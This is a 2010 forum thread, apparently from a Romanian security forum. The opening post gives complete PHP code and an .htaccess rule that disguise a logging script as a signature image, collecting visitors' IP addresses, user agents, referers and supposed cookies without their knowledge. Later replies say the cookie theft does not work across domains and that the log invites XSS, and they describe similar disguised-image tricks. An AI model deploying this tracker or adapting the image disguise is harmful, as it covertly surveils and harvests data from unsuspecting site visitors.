Paul4games Posted September 21, 2010 Report Posted September 21, 2010 Before you even waste your time Reading this you need basic knowlwge of PHP images using .htaccess RewriteEngine mod.YOUR HOST MUST SUPPORT YOU EDITING THE HTACCESS FILE OR THIS WONT WORK!!! FREE HOSTS USUALLY DONT LET YOU SO GOOGLE IT!We start buy making the actual logger the PHP file that will do our dirtywork behind the scenes.grabber.php<?phpputenv("TZ=Europe/Oslo");$ipLog="cookies.html";$ip = $_SERVER['REMOTE_ADDR'];$user_agent = $_SERVER['HTTP_USER_AGENT'];$host = $_SERVER['REMOTE_HOST'];$referer = $_SERVER['HTTP_REFERER'];$date=date ("l dS \of F Y h:i:s A");$log=fopen("$ipLog", "a+");$port = $_SERVER['REMOTE_PORT'];$cookie = $HTTP_GET_VARS["c"];fputs($log, "<p>--</p><b> Host:</b><i> $host </i><br><b> Port:</b> $port <br><b> Cookies:</b><font size='2'> $cookie </font><br><b> User-Agent:</b> $user_agent <br><b> Referer:</b> <a href='$referer'><font size='2' color='gray'>$referer</font></a> <br><b> IP:</b> <a href='http://$ip'><font size='2' color='gray'>$ip</font></a> -<a href='http://www.dnsstuff.com/tools/ipall.ch?ip=$ip&src=ShowIP'><font size='2' color='gray'>DNS-Ping</font></a><br><b> Date:</b> $date");?>cookies.htmlCookies__.htaccessRewriteEngine onRewriteRule ^sig.png$ grabber.phponce you have all on your server go to a site and use the img tags and use the image linked to the php file so if you used the name i used you would use [\img]yoursite.com/sig.png[\img]take out the slashs those are there so it doesnt use the code,your cookies will apear in the cookies.html like thisI AM NOT RESPONSIBLE FOR HOW YOU USE THIS INFORMATION!!!!Autor:Tyler777(cred)Ps:Eu nu sunt autorul acestui articol si nu sunt responsabil cum folositi aceste informatii! Quote
Xander Posted September 21, 2010 Report Posted September 21, 2010 ce bine era daca era asa simplu... din pacate din cate stiu eu pentru ca poza se afla pe alt domeniu decat site-ul in cauza... nu iti trimite cookies pentru domeniul unde ai pus semnatura/avataru... Quote
Nytro Posted September 21, 2010 Report Posted September 21, 2010 Mi se pare o mare tampenie. 1) $ipLog="cookies.html"; - Datele sunt salvate intr-un fisier HTML, asta inseamna un posibil XSS (na, nu prea util, dar cine stie)2) $cookie = $HTTP_GET_VARS["c"]; - Asta nu e cookie Da, salveaza cateva date, dar cam atat, cookie pauza.Si se poate mai elegant, sa se foloseasca php_gd si sa se genereze o imagine png, astfel nu va avea cum sa stie nimeni (nu neaparat) ca e vorba de un script PHP. Quote
Xander Posted September 21, 2010 Report Posted September 21, 2010 mi-am facut eu asta pe forumu la autoit mai demult... puteam sa iau ip/user agent... (cu php gd cum a zis nytro) si cu mod_rewrite... dar cookie ... nu se poate lua... adica nu pentru domeniul unde e incarcata poza... (daca 'poza' e pe http://example.com/mypic.png poti sa vezi doar cookies pentru example.com...) Quote
curtuy Posted September 22, 2010 Report Posted September 22, 2010 (edited) Tutorialul e bun , insa conceptul e vechi:Postat de @paxnWo: Cum sa iei date despre cel caruia ii trimiti un emailPostat de @tromfil: Aduna informatii pe baza unei imaginiLegat strict de cookies e cum a zis @Xander:pentru ca poza se afla pe alt domeniu decat site-ul in cauza... nu iti trimite cookies pentru domeniul unde ai pus semnatura/avataruEdit: metoda lui @loki: Victima yahoo: Semnatura ascunsa in yahoo mail Edited September 22, 2010 by curtuy Quote
loki Posted September 22, 2010 Report Posted September 22, 2010 sau postat de mine pe undeva: denumesti un folder cu extensia jpg.pui fisierul http://situlmeu.com/imagine.jpg/index.php'>http://situlmeu.com/imagine.jpg/index.phptrimiti link-ul http://situlmeu.com/imagine.jpgindex.php va afisa o poza. Ce se observa in aceasta metoda ca in addressbar va apare imagine.jpg/ (va apare un slash) Quote
